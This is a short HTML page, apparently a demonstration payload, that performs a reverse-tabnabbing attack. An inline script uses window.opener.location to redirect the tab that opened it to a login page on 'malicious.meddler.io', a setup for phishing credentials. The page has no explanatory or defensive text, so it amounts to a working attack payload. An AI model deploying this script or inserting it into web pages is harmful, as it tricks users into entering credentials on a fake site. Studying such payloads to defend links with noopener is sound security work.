<!DOCTYPE html>
<html>
<head>
</head>
 <body>
    <img src="https://malicious.meddler.io/public/images/sq.jpeg">
  <script>
  window.opener.location = "https://malicious.meddler.io/login";
  </script>
 </body>
</html>

